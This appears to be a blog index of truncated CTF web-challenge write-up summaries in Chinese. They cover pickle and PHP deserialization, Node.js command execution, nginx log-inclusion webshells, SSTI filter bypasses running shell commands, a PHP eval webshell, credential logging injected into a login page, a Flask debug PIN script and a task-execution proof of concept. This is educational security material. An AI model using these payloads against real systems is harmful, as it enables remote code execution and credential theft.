摘要:
pickle是python语言的一个标准模块,实现了基本的数据序列化和反序列化。 | 函数 | 功能 | | | | | dumps | 对象序列化为二进制字符串 | | dump | 对象序列化为文件对象 | | loads | 二进制字符串反序列化为对象 | | load | 从文件读取数据反序 阅读全文
摘要:
baby_php <?php error_reporting(0); class Welcome{ public $name; public $arg = 'oww!man!!'; public function __construct(){ $this->name = 'ItS SO CREAZY 阅读全文
摘要:
Nodejs-Web336 global.process.mainModule.constructor._load('child_process').execSync('ls') eval执行代码,过滤了exec,上面的payload用不了 网上搜集的payload require('child_p 阅读全文
摘要:
包含nginx日志 ua写一句话 日志路径/var/log/nginx/access.log 绕过死亡exit php://filter php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 阅读全文
摘要:
RCE-Web32 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", 阅读全文
摘要:
SSTI各种绕过 SSTI-Web363 过滤单双引号 {{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag SSTI- 阅读全文
摘要:
ssti 常规的ssti php-blog admin 12345 进入后台,发一篇文章, 内容填<?php eval($_POST['pass']); 直接getshell 然后在login.php里面加一句 file_put_contents('login.txt',$username." ". 阅读全文
摘要:
EZSSTI ?name={{''.__class__.__mro__[-1].__subclasses__()}} 查看所有子类 from requests import * for i in range(300): url="http://4dcc7f0f-0e07-49e1-b2c8-b9ce 阅读全文
摘要:
前提条件:Debug开启 来自:https://pysnow.cn/archives/170/ 高版本 import hashlib from itertools import chain probably_public_bits = [ 'root' # /etc/passwd 'flask.ap 阅读全文
摘要:
function poc(){ $.get('/service/app/tasks.php?type=task_list',{},function(data){ var id=data.data[0].ID; $.post('/service/app/tasks.php?type=exec_task 阅读全文